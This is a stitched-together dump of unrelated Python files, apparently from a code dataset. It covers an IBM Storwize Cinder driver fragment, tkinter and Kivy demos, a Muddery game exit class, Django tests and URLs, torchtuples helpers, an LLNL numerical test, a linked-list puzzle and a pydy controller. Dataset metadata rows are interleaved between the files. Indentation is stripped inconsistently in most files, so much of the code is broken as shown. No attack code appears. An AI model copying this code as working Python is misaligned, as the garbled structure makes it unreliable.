LOG.error(_LE('Unable to rename the logical volume '
'for volume: %s'), volume['id'])
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
# If the back-end name(id) for the volume has been renamed,
# it is OK for the volume to keep the original name(id) and there is
# no need to use the column "_name_id" to establish the mapping
# relationship between the volume id and the back-end volume
# name(id).
# Set the key "_name_id" to None for a successful rename.
model_update = {'_name_id': None}
return model_update
    def manage_existing(self, volume, ref):
        """Manages an existing vdisk.
        Renames the vdisk to match the expected name for the volume.
        Error checking done by manage_existing_get_size is not repeated -
        if we got here then we have a vdisk that isn't in use (or we don't
        care if it is in use).
        """
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
vdisk_io_grp = self._helpers.get_volume_io_group(vdisk['name'])
        if vdisk_io_grp not in self._state['available_iogrps']:
            msg = (_("Failed to manage existing volume because the "
                     "volume to be managed is not in a valid "
                     "I/O group."))
            raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if volume['volume_type_id']:
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
vdisk_copy = self._helpers.get_vdisk_copy_attrs(vdisk['name'], '0')
            if vdisk_copy['autoexpand'] == 'on' and opts['rsize'] == -1:
                msg = (_("Failed to manage existing volume because the "
                         "volume to be managed is thin, but "
                         "the volume type chosen is thick."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if not vdisk_copy['autoexpand'] and opts['rsize'] != -1:
                msg = (_("Failed to manage existing volume because the "
                         "volume to be managed is thick, but "
                         "the volume type chosen is thin."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if (vdisk_copy['compressed_copy'] == 'no' and
                    opts['compression']):
                msg = (_("Failed to manage existing volume because the "
                         "volume to be managed is not compressed, but "
                         "the volume type chosen is compressed."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if (vdisk_copy['compressed_copy'] == 'yes' and
                    not opts['compression']):
                msg = (_("Failed to manage existing volume because the "
                         "volume to be managed is compressed, but "
                         "the volume type chosen is not compressed."))
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
            if vdisk_io_grp != opts['iogrp']:
                msg = (_("Failed to manage existing volume due to "
                         "I/O group mismatch. The I/O group of the "
                         "volume to be managed is %(vdisk_iogrp)s. The "
                         "I/O group of the chosen type is "
                         "%(opt_iogrp)s.") %
                       {'vdisk_iogrp': vdisk['IO_group_name'],
                        'opt_iogrp': opts['iogrp']})
                raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
        pool = utils.extract_host(volume['host'], 'pool')
        if vdisk['mdisk_grp_name'] != pool:
            msg = (_("Failed to manage existing volume because the pool "
                     "of the volume to be managed does not match the "
                     "backend pool. Pool of the volume to be managed "
                     "is %(vdisk_pool)s. Pool of the backend is "
                     "%(backend_pool)s.") %
                   {'vdisk_pool': vdisk['mdisk_grp_name'],
                    'backend_pool': pool})
            raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
"""Return size of an existing Vdisk for manage_existing.
existing_ref is a dictionary of the form:
{'source-id': <uid of disk>} or
{'source-name': <name of the disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.Gi))
def unmanage(self, volume):
"""Remove the specified volume from Cinder management."""
pass
def get_volume_stats(self, refresh=False):
"""Get volume stats.
        If we haven't gotten stats yet or 'refresh' is True,
        update the stats first.
"""
if not self._stats or refresh:
self._update_volume_stats()
return self._stats
def create_consistencygroup(self, context, group):
"""Create a consistency group.
IBM Storwize will create CG until cg-snapshot creation,
db will maintain the volumes and CG relationship.
"""
LOG.debug("Creating consistency group.")
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
return model_update
def delete_consistencygroup(self, context, group, volumes):
"""Deletes a consistency group.
IBM Storwize will delete the volumes of the CG.
"""
LOG.debug("Deleting consistency group.")
model_update = {}
model_update['status'] = fields.ConsistencyGroupStatus.DELETED
volumes = self.db.volume_get_all_by_group(context, group['id'])
for volume in volumes:
try:
self._helpers.delete_vdisk(volume['name'], True)
volume['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
volume['status'] = 'error_deleting'
if model_update['status'] != 'error_deleting':
model_update['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the volume %(vol)s of CG. "
"Exception: %(exception)s."),
{'vol': volume['name'], 'exception': err})
return model_update, volumes
def update_consistencygroup(self, ctxt, group, add_volumes,
remove_volumes):
"""Adds or removes volume(s) to/from an existing consistency group."""
LOG.debug("Updating consistency group.")
return None, None, None
def create_consistencygroup_from_src(self, context, group, volumes,
cgsnapshot=None, snapshots=None,
source_cg=None, source_vols=None):
"""Creates a consistencygroup from source.
:param context: the context of the caller.
:param group: the dictionary of the consistency group to be created.
:param volumes: a list of volume dictionaries in the group.
:param cgsnapshot: the dictionary of the cgsnapshot as source.
:param snapshots: a list of snapshot dictionaries in the cgsnapshot.
:param source_cg: the dictionary of a consistency group as source.
:param source_vols: a list of volume dictionaries in the source_cg.
:return model_update, volumes_model_update
"""
LOG.debug('Enter: create_consistencygroup_from_src.')
if cgsnapshot and snapshots:
cg_name = 'cg-' + cgsnapshot.id
sources = snapshots
elif source_cg and source_vols:
cg_name = 'cg-' + source_cg.id
sources = source_vols
else:
error_msg = _("create_consistencygroup_from_src must be "
"creating from a CG snapshot, or a source CG.")
raise exception.InvalidInput(reason=error_msg)
LOG.debug('create_consistencygroup_from_src: cg_name %(cg_name)s'
' %(sources)s', {'cg_name': cg_name, 'sources': sources})
self._helpers.create_fc_consistgrp(cg_name)
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.create_cg_from_source(group,
cg_name,
sources,
volumes,
self._state,
self.configuration,
timeout))
LOG.debug("Leave: create_consistencygroup_from_src.")
return model_update, snapshots_model
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Creates a cgsnapshot."""
# Use cgsnapshot id as cg name
cg_name = 'cg_snap-' + cgsnapshot['id']
# Create new cg as cg_snapshot
self._helpers.create_fc_consistgrp(cg_name)
snapshots = self.db.snapshot_get_all_for_cgsnapshot(
ctxt, cgsnapshot['id'])
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.run_consistgrp_snapshots(cg_name,
snapshots,
self._state,
self.configuration,
timeout))
return model_update, snapshots_model
def delete_cgsnapshot(self, context, cgsnapshot, snapshots):
"""Deletes a cgsnapshot."""
cgsnapshot_id = cgsnapshot['id']
cg_name = 'cg_snap-' + cgsnapshot_id
snapshots = self.db.snapshot_get_all_for_cgsnapshot(context,
cgsnapshot_id)
model_update, snapshots_model = (
self._helpers.delete_consistgrp_snapshots(cg_name,
snapshots))
return model_update, snapshots_model
def get_pool(self, volume):
attr = self._helpers.get_vdisk_attributes(volume['name'])
if attr is None:
msg = (_('get_pool: Failed to get attributes for volume '
'%s') % volume['name'])
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return attr['mdisk_grp_name']
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug("Updating volume stats.")
data = {}
data['vendor_name'] = 'IBM'
data['driver_version'] = self.VERSION
data['storage_protocol'] = self.protocol
data['pools'] = []
data['multiattach'] = (self.configuration.
storwize_svc_multihostmap_enabled)
backend_name = self.configuration.safe_get('volume_backend_name')
data['volume_backend_name'] = (backend_name or
self._state['system_name'])
data['pools'] = [self._build_pool_stats(pool)
for pool in
self.configuration.storwize_svc_volpool_name]
data['replication'] = self._replication_enabled
data['replication_enabled'] = self._replication_enabled
        data['replication_targets'] = self._get_replication_targets()
self._stats = data
def _build_pool_stats(self, pool):
"""Build pool status"""
QoS_support = True
pool_stats = {}
try:
pool_data = self._helpers.get_pool_attrs(pool)
if pool_data:
easy_tier = pool_data['easy_tier'] in ['on', 'auto']
total_capacity_gb = float(pool_data['capacity']) / units.Gi
free_capacity_gb = float(pool_data['free_capacity']) / units.Gi
allocated_capacity_gb = (float(pool_data['used_capacity']) /
units.Gi)
location_info = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
{'sys_id': self._state['system_id'],
'pool': pool_data['name']})
pool_stats = {
'pool_name': pool_data['name'],
'total_capacity_gb': total_capacity_gb,
'free_capacity_gb': free_capacity_gb,
'allocated_capacity_gb': allocated_capacity_gb,
'compression_support': self._state['compression_enabled'],
'reserved_percentage':
self.configuration.reserved_percentage,
'QoS_support': QoS_support,
'consistencygroup_support': True,
'location_info': location_info,
'easytier_support': easy_tier
}
if self._replication_enabled:
pool_stats.update({
'replication_enabled': self._replication_enabled,
'replication_type': self._supported_replication_types,
'replication_targets': self._get_replication_targets(),
'replication_count': len(self._replication_targets)
})
elif self.replication:
pool_stats.update(self.replication.get_replication_info())
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.VolumeBackendAPIException(data=msg)
return pool_stats
def _get_replication_targets(self):
return [target['backend_id'] for target in self._replication_targets]
def _manage_input_check(self, ref):
"""Verify the input of manage function."""
# Check that the reference is valid
if 'source-name' in ref:
manage_source = ref['source-name']
vdisk = self._helpers.get_vdisk_attributes(manage_source)
elif 'source-id' in ref:
manage_source = ref['source-id']
vdisk = self._helpers.vdisk_by_uid(manage_source)
else:
reason = _('Reference must contain source-id or '
'source-name element.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
if vdisk is None:
reason = (_('No vdisk with the UID specified by ref %s.')
% manage_source)
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return vdisk
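    # Illustrative only (not part of the driver): _manage_input_check expects
    # a reference dict keyed by either 'source-name' or 'source-id'; the
    # values below are placeholders.
    #
    #     self._manage_input_check({'source-name': 'volume-00000001'})
    #     self._manage_input_check({'source-id': '60050768...'})
    #
    # Any other shape raises ManageExistingInvalidReference.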

# ==== path: /open_window.py | repo: crazcalm/learn_tkinter_canvas | license: MIT ====
import tkinter as tk
window = tk.Tk()
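# Illustrative addition (not in the original file): this repo is about
# learning the tkinter Canvas, so draw a couple of items before entering the
# main loop. Sizes, coordinates and colors are arbitrary.
canvas = tk.Canvas(window, width=200, height=200, bg="white")
canvas.create_line(10, 10, 190, 190, fill="blue")
canvas.create_oval(50, 50, 150, 150, outline="red")
canvas.pack()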
window.mainloop()
"[email protected]"
]
| |

# ==== path: /muddery/server/typeclasses/locked_exit.py | repo: nobodxbodon/muddery | license: BSD-3-Clause ====
"""
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
"""
    Characters must unlock these exits to pass them.
The view and commands of locked exits are different from unlocked exits.
"""
typeclass_key = "LOCKED_EXIT"
typeclass_name = _("Locked Exit", "typeclasses")
model_name = "exit_locks"
def after_data_loaded(self):
"""
Set data_info to the object."
"""
super(MudderyLockedExit, self).after_data_loaded()
self.unlock_condition = getattr(self.system, "unlock_condition", "")
self.unlock_verb = getattr(self.system, "unlock_verb", "")
self.locked_desc = getattr(self.system, "locked_desc", "")
self.auto_unlock = getattr(self.system, "auto_unlock", False)
self.unlock_forever = getattr(self.system, "unlock_forever", True)
def at_before_traverse(self, traversing_object):
"""
Called just before an object uses this object to traverse to
another object (i.e. this object is a type of Exit)
Args:
traversing_object (Object): The object traversing us.
Notes:
The target destination should normally be available as
`self.destination`.
If this method returns False/None, the traverse is cancelled
before it is even started.
"""
if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
return False
        # Characters can only pass exits that have already been unlocked.
if traversing_object.is_exit_unlocked(self.get_data_key()):
if not self.unlock_forever:
# lock the exit again
traversing_object.lock_exit(self)
return True
if self.auto_unlock and self.can_unlock(traversing_object):
# Can unlock the exit automatically.
if self.unlock_forever:
# Unlock it.
traversing_object.unlock_exit(self)
return True
# Show the object's appearance.
appearance = self.get_appearance(traversing_object)
traversing_object.msg({"look_obj": appearance})
return False
def can_unlock(self, caller):
"""
Unlock an exit.
"""
        # Can only unlock exits whose unlock conditions match.
return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
def get_appearance(self, caller):
"""
This is a convenient hook for a 'look'
command to call.
"""
# Get name and description.
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
can_unlock = self.can_unlock(caller)
if self.auto_unlock and can_unlock:
if self.unlock_forever:
                # Automatically unlock the exit when a character looks at it.
caller.unlock_exit(self)
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
cmds = []
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]
info = {"dbref": self.dbref,
"name": self.name,
"desc": self.locked_desc,
"cmds": cmds}
return info
def get_available_commands(self, caller):
"""
This returns a list of available commands.
"args" must be a string without ' and ", usually it is self.dbref.
"""
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common commands.
return super(MudderyLockedExit, self).get_available_commands(caller)
cmds = []
can_unlock = STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
return cmds
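    # Illustrative only (names assumed): the command dicts returned above are
    # plain data, so a hypothetical client/UI layer could render them like:
    #
    #     for cmd in locked_exit.get_available_commands(caller):
    #         show_button(label=cmd["name"], command=cmd["cmd"], args=cmd["args"])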

# ==== path: /{{cookiecutter.project_name}}/tests/test_server/test_urls.py | repo: viktortat/wemake-django-template | license: MIT ====
# -*- coding: utf-8 -*-
def test_admin_unauthorized(client):
"""This test ensures that admin panel requires auth."""
response = client.get('/admin/')
assert response.status_code == 302
def test_admin_authorized(admin_client):
"""This test ensures that admin panel is accessible."""
response = admin_client.get('/admin/')
assert response.status_code == 200
def test_robots_txt(client):
"""This test ensures that `robots.txt` is accessible."""
response = client.get('/robots.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'
def test_humans_txt(client):
"""This test ensures that `humans.txt` is accessible."""
response = client.get('/humans.txt')
assert response.status_code == 200
assert response.get('Content-Type') == 'text/plain'

# ==== path: /torchtuples/utils.py | repo: georgehc/dksa | license: MIT, BSD-2-Clause ====
import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
year, month, day, hour, minute, second = time.localtime()[:6]
ascii_letters_digits = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
random_hash = ''.join(random.choices(ascii_letters_digits, k=20))
path = f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
return path
class TimeLogger:
def __init__(self, start=None):
self.start = self.time() if start is None else start
self.prev = self.start
@staticmethod
def time():
return time.time()
def diff(self):
prev, self.prev = (self.prev, self.time())
return self.prev - self.start, self.prev - prev
@staticmethod
def _hms_from_sec(sec):
"""Hours, minutes, seconds."""
m, s = divmod(sec, 60)
h, m = divmod(m, 60)
return h, m, s
@staticmethod
def _hms_str(h, m, s, shorten=True):
"""Hours, minutes, seconds."""
hs = f"{int(h)}h:"
ms = f"{int(m)}m:"
ss = f"{int(s)}s"
if shorten:
if h == 0:
hs = ''
if m == 0:
ms = ''
return f"{hs}{ms}{ss}"
# return f"{int(h)}h:{int(m)}m:{int(s)}s"
def hms_diff(self, shorten=True):
diff_start, diff_prev = self.diff()
hms_start = self._hms_from_sec(diff_start)
hms_prev = self._hms_from_sec(diff_prev)
return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
def array_or_tensor(tensor, numpy, input):
"""Returs a tensor if numpy is False or input is tensor.
Else it returns numpy array, even if input is a DataLoader.
"""
is_tensor = None
if numpy is False:
is_tensor = True
elif (numpy is True) or is_dl(input):
is_tensor = False
elif not (is_data(input) or is_dl(input)):
raise ValueError(f"Do not understand type of `input`: {type(input)}")
elif tuplefy(input).type() is torch.Tensor:
is_tensor = True
elif tuplefy(input).type() is np.ndarray:
is_tensor = False
else:
raise ValueError("Something wrong")
if is_tensor:
tensor = tuplefy(tensor).to_tensor().val_if_single()
else:
tensor = tuplefy(tensor).to_numpy().val_if_single()
return tensor
def is_data(input):
"""Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
datatypes = [np.ndarray, torch.Tensor, tuple, list, TupleTree]
return any([isinstance(input, ct) for ct in datatypes])
def is_dl(input):
"""Returns True if `input` is a DataLoader (inherit from DataLoader)."""
return isinstance(input, torch.utils.data.DataLoader)
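
if __name__ == "__main__":
    # Illustrative smoke checks (not part of the library), exercising the
    # helpers above with plain numpy/torch inputs.
    assert is_data(np.zeros(3)) and is_data(torch.zeros(3))
    assert not is_data("a plain string is not data")
    print(make_name_hash("model"))  # e.g. model_2021-1-1_12-0-0_<hash>.pt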

# ==== path: /main.py | repo: lailacampos/Simple-GUI-Kivy | license: none ====
# Useful links:
# https://kivy.org/doc/stable/guide/basic.html#quickstart
# https://kivy.org/doc/stable/api-kivy.app.html
# https://youtu.be/YDp73WjNISc
from kivy.app import App
from kivy.uix.label import Label
# The MyApp class is derived from the App class of the kivy.app module.
# The App() class is the base for creating Kivy applications.
# Kivy requires that the class inherits from the App class
class MyApp(App):
# The build() method initializes the application and returns a widget that will be used as [root] and added to the window.
    # This method doesn't need to be called directly: App().run() will do that.
def build(self):
label = Label(text="Hello World")
return label
if __name__ == "__main__":
MyApp().run()
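
# Illustrative variant (not in the original file): the same App pattern with a
# Button instead of a Label. MyButtonApp is a hypothetical name; Button is the
# stock widget from kivy.uix.button. Kept commented out because run() blocks.
#
# from kivy.uix.button import Button
#
# class MyButtonApp(App):
#     def build(self):
#         return Button(text="Click me")
#
# MyButtonApp().run()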

# ==== path: /numericalFunctions/ptwXY/Python/Test/Flat/binaryMath/flatMath.py | repo: LLNL/gidiplus | license: MIT ====
# <<BEGIN-copyright>>
# Copyright 2019, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: MIT
# <<END-copyright>>
import os
from numericalFunctions import pointwiseXY_C
accuracy = 1e-2
biSectionMax = 0.
if( 'CHECKOPTIONS' in os.environ ) :
options = os.environ['CHECKOPTIONS'].split( )
if( '-e' in options ) : print( __file__ )
CPATH = '../../../../Test/Flat/binaryMath'
os.system( 'cd %s; make -s clean; ./flatMath -v > v' % CPATH )
def skipBlankLines( ls ) :
i = 0
for i, l in enumerate( ls ) :
if( l.strip( ) != '' ) : break
ls = ls[i:]
if( ( len( ls ) == 1 ) and ( ls[0].strip( ) == '' ) ) : ls = []
return( ls )
def getIntegerValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = int( ls[0].split( '=' )[1] )
return( ls[1:], value )
def getDoubleValue( name, ls ) :
s = "# %s = " % name
n = len( s )
if( ls[0][:n] != s ) : raise Exception( '%s: missing %s info: "%s"' % ( __file__, name, ls[0][:-1] ) )
value = float( ls[0].split( '=' )[1] )
return( ls[1:], value )
def compareValues( label, i, v1, v2 ) :
sv1, sv2 = '%.12e' % v1, '%.12e' % v2
sv1, sv2 = '%.7e' % float( sv1 ), '%.7e' % float( sv2 )
if( sv1 != sv2 ) : print( '<%s> <%s>' % ( sv1, sv2 ) )
if( sv1 != sv2 ) : raise Exception( '%s: values %e and %e diff by %e at %d for label = %s' % ( __file__, v1, v2, v2 - v1, i, label ) )
def getXYData( ls, biSectionMax, accuracy ) :
ls, length = getIntegerValue( 'length', ls )
data = [ list( map( float, ls[i].split( ) ) ) for i in range( length ) ]
data = pointwiseXY_C.pointwiseXY_C( data, initialSize = len( data ), overflowSize = 10, biSectionMax = biSectionMax, accuracy = accuracy, safeDivide = True, interpolation = "flat" )
ls = ls[length:]
ls = skipBlankLines( ls )
return( ls, data )
def getCommand( ls ) :
s = ls[0].split( )
if( len( s ) != 2 ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
if( s[0] != "#" ) : raise Exception( 'Invalid command = "%s"' % ls[0][:-1] )
return( ls[1:], s[1] )
def compareXYs( XYs1, XYs2, label ) :
if( len( XYs1 ) != len( XYs2 ) ) : raise Exception( 'for %s: len( XYs1 ) = %s != len( XYs2 ) = %s' % ( label, len( XYs1 ), len( XYs2 ) ) )
for i, xy in enumerate( XYs1 ) :
compareValues( "x division " + label, count, xy[0], XYs2[i][0] )
compareValues( "y division " + label, count, xy[1], XYs2[i][1] )
def mathParse( count, ls ) :
ls, command = getCommand( ls )
if( command == 'double' ) :
ls = doubleCheck( count, ls )
elif( command == 'all_double' ) :
ls = allDoubleCheck( count, ls )
elif( command == 'binary_add_sub' ) :
ls = binaryAddSubCheck( count, ls )
elif( command == 'binary_mul_div' ) :
ls = binaryMulDivCheck( count, ls )
else :
raise Exception( 'Invalid command = "%s"' % command )
return( ls )
def doubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, o = getCommand( ls )
if( o not in '+-=*/\\' ) : raise Exception( 'Unknown operator "%s"' % o )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
if( o == '+' ) : results = XYs + d
elif( o == '-' ) : results = XYs - d
elif( o == '=' ) : results = d - XYs
elif( o == '*' ) : results = XYs * d
elif( o == '/' ) : results = XYs / d
elif( o == '\\' ) : results = d / XYs
compareXYs( resultsC, results, "doubleCheck %s" % o )
return( ls )
def allDoubleCheck( count, ls ) :
ls, d = getDoubleValue( 'double', ls )
ls, XYs = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = ( ( d * ( XYs + d ) ) - d ) / d
results = ( ( ( d * results ) + d ) / d ) - d
compareXYs( resultsC, results, "allDoubleCheck" )
return( ls )
def binaryAddSubCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 + XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results - XYs2
compareXYs( resultsC, results, "binaryAddSubCheck" )
return( ls )
def binaryMulDivCheck( count, ls ) :
ls, XYs1 = getXYData( ls, biSectionMax, accuracy )
ls, XYs2 = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = XYs1 * XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
ls, dummy = getXYData( ls, biSectionMax, accuracy )
ls, resultsC = getXYData( ls, biSectionMax, accuracy )
results = results / XYs2
compareXYs( resultsC, results, "binaryMulDivCheck" )
return( ls )
f = open( os.path.join( CPATH, 'v' ) )
ls = f.readlines( )
f.close( )
ls, accuracy = getDoubleValue( 'accuracy', ls )
count = 0
while( len( ls ) ) :
count += 1
ls = mathParse( count, ls )

# ==== path: /linked_lists/remove_nth_from_end.py | repo: hao89/diary_of_programming_puzzles | license: none ====
"""
Given a linked list, remove the nth node from the end of the list and return
its head.
For example,
Given the linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes
1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass
"""
# @param head a reference to the head of the list
# @param n the position (from the tail) of the node that should be deleted
# @return a new linked list with the required node deleted
def remove_nth_from_end(head, n):
n_behind_node = head
faster_node = head
before_behind_node = head
for i in xrange(0, n):
faster_node = faster_node.next
while faster_node:
faster_node = faster_node.next
before_behind_node = n_behind_node
n_behind_node = n_behind_node.next
# handle situation where there is only one node in the linked list or the
# head is the one being removed
if before_behind_node == n_behind_node:
if not n_behind_node.next:
head = None
else:
head = n_behind_node.next
else:
before_behind_node.next = before_behind_node.next.next
return head
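
# Minimal usage sketch (illustrative): the file never defines a node class, so
# a tiny stand-in is assumed here -- any object with a `next` attribute works.
class _Node(object):
    def __init__(self, val):
        self.val = val
        self.next = None

if __name__ == "__main__":
    nodes = [_Node(v) for v in (1, 2, 3, 4, 5)]
    for first, second in zip(nodes, nodes[1:]):
        first.next = second
    head = remove_nth_from_end(nodes[0], 2)
    values = []
    while head:
        values.append(head.val)
        head = head.next
    assert values == [1, 2, 3, 5]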

# ==== path: /venv/bin/pip | repo: NARESHSWAMI199/5-Star-On-Hacker-Rank-Python | license: none ====
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())

# ==== path: /ats/users/urls.py | repo: MahmoudFarid/ats | license: MIT ====
from django.urls import path
from ats.users.views import (
user_detail_view,
user_redirect_view,
user_update_view,
)
app_name = "users"
urlpatterns = [
path("~redirect/", view=user_redirect_view, name="redirect"),
path("~update/", view=user_update_view, name="update"),
path("<str:email>/", view=user_detail_view, name="detail"),
]

# ==== path: /notebooks/solution/control.py | repo: nanounanue/pydy-tutorial-pycon-2014 | license: CC-BY-4.0 ====
#!/usr/bin/env python
# Controller Design
from numpy import zeros, matrix, eye, dot, asarray
from numpy.linalg import inv
from scipy.linalg import solve_continuous_are
from .utils import controllable
from .visualization import *
equilibrium_point = zeros(len(coordinates + speeds))
equilibrium_dict = dict(zip(coordinates + speeds, equilibrium_point))
parameter_dict = dict(zip(constants, numerical_constants))
linear_state_matrix, linear_input_matrix, inputs = kane.linearize()
f_A_lin = linear_state_matrix.subs(parameter_dict).subs(equilibrium_dict)
f_B_lin = linear_input_matrix.subs(parameter_dict).subs(equilibrium_dict)
m_mat = mass_matrix.subs(parameter_dict).subs(equilibrium_dict)
A = matrix(m_mat.inv() * f_A_lin).astype(float)
B = matrix(m_mat.inv() * f_B_lin).astype(float)
assert controllable(A, B)
Q = matrix(eye(6))
R = matrix(eye(3))
S = solve_continuous_are(A, B, Q, R)
K = inv(R) * B.T * S
# This is an annoying little issue. We specified the order of things when
# creating the rhs function, but the linearize function returns the F_B
# matrix in the order corresponding to whatever order it finds the joint
# torques. This would also screw things up if we specified a different
# ordering of the coordinates and speeds as the standard kana._q + kane._u
K = K[[0, 2, 1], :]
def controller(x, t):
return -asarray(dot(K, x)).flatten()
args['specified'] = controller
y = odeint(right_hand_side, x0, t, args=(args,))
| [
"[email protected]"
]
| |
a18b2132c6645e3c3e8102f1e3acf82ca7ee3c73 | bc441bb06b8948288f110af63feda4e798f30225 | /tuna_service_sdk/model/easy_flow/task_pb2.pyi | 99c3f43d6dca4676b4ba29fcf6e453c206047933 | [
"Apache-2.0"
]
| permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,667 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from google.protobuf.struct_pb2 import (
Struct as google___protobuf___struct_pb2___Struct,
)
from tuna_service_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as tuna_service_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from tuna_service_sdk.model.easy_flow.package_info_pb2 import (
PackageInfo as tuna_service_sdk___model___easy_flow___package_info_pb2___PackageInfo,
)
from tuna_service_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as tuna_service_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class Task(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class ConfigList(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Configs(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Items(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
path = ... # type: typing___Text
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
path : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Task.ConfigList.Configs.Items: ...
else:
@classmethod
